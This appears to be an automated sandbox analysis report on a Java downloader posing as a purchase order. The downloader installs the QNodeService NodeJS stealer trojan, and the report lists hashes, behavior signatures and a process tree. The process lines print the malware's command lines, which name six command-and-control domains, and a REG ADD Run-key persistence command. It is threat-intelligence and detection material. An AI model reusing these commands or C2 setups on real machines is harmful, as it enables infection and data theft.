Analysis
-
max time kernel
90s -
max time network
155s -
platform
windows10_x64 -
resource
win10 -
submitted
22-07-2020 07:42
Static task
static1
Behavioral task
behavioral1
Sample
Jiu Chang Co. Ltd Purchase order.jar
Resource
win7
Behavioral task
behavioral2
Sample
Jiu Chang Co. Ltd Purchase order.jar
Resource
win10
General
-
Target
Jiu Chang Co. Ltd Purchase order.jar
-
Size
13KB
-
MD5
eb1e10dfe6e6dfa0f583773c8ff95d30
-
SHA1
0e871dbd3d9aca806db001ccd06f77202a8b7757
-
SHA256
d47d68e878628d7e76a399021d738eb0b0d1cb2c3892220302876790b1a6c3c3
-
SHA512
f68e459cae33ff634223e96bc5c476d2c82479468c393a3af609ca31bf6af0bbff1ec048f2aea82ea3d960873306941f2e1b3ee9db2ec343866cf987f9337a10
Malware Config
Signatures
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 4032 wrote to memory of 2324 4032 java.exe 68 PID 4032 wrote to memory of 2324 4032 java.exe 68 PID 2324 wrote to memory of 3924 2324 node.exe 69 PID 2324 wrote to memory of 3924 2324 node.exe 69 PID 3924 wrote to memory of 3916 3924 cmd.exe 70 PID 3924 wrote to memory of 3916 3924 cmd.exe 70 PID 2324 wrote to memory of 2212 2324 node.exe 71 PID 2324 wrote to memory of 2212 2324 node.exe 71 -
Loads dropped DLL 4 IoCs
pid Process 2212 node.exe 2212 node.exe 2212 node.exe 2212 node.exe -
JavaScript code in executable 2 IoCs
resource yara_rule behavioral2/files/0x000100000001adc2-114.dat js behavioral2/files/0x000100000001adc2-120.dat js -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe -
Executes dropped EXE 2 IoCs
pid Process 2324 node.exe 2212 node.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2212 node.exe 2212 node.exe -
QNodeService NodeJS Trojan 1 IoCs
resource yara_rule behavioral2/files/0x000100000001c003-116.dat family_qnodeservice -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 7 wtfismyip.com 8 wtfismyip.com -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Run\qnodejs-b8f0ff2b = "cmd /D /C \"C:\\Users\\Admin\\qnodejs-node-v13.13.0-win-x64\\qnodejs\\qnodejs-b8f0ff2b.cmd\"" reg.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe -
QNodeService
is a trojan written in NodeJS and spread via Java downloader. Utilizes stealer functionality.
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar "C:\Users\Admin\AppData\Local\Temp\Jiu Chang Co. Ltd Purchase order.jar"1⤵
- Suspicious use of WriteProcessMemory
PID:4032 -
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exeC:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\wizard.js start --group user:[email protected] --register-startup --central-base-url https://benty1.gotdns.ch --central-base-url https://putisk.myvnc.com --central-base-url https://buenosza.hopto.org --central-base-url https://opensa.publicvm.com --central-base-url https://ulrich7.linkpc.net --central-base-url https://zaploni.linkpc.net2⤵
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
PID:2324 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-b8f0ff2b" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-b8f0ff2b.cmd\"""3⤵
- Suspicious use of WriteProcessMemory
PID:3924 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-b8f0ff2b" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-b8f0ff2b.cmd\""4⤵
- Adds Run key to start application
PID:3916
-
-
-
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exeC:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-win32-x64.js serve start --group user:[email protected] --register-startup --central-base-url https://benty1.gotdns.ch --central-base-url https://putisk.myvnc.com --central-base-url https://buenosza.hopto.org --central-base-url https://opensa.publicvm.com --central-base-url https://ulrich7.linkpc.net --central-base-url https://zaploni.linkpc.net3⤵
- Loads dropped DLL
- Checks processor information in registry
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2212
-
-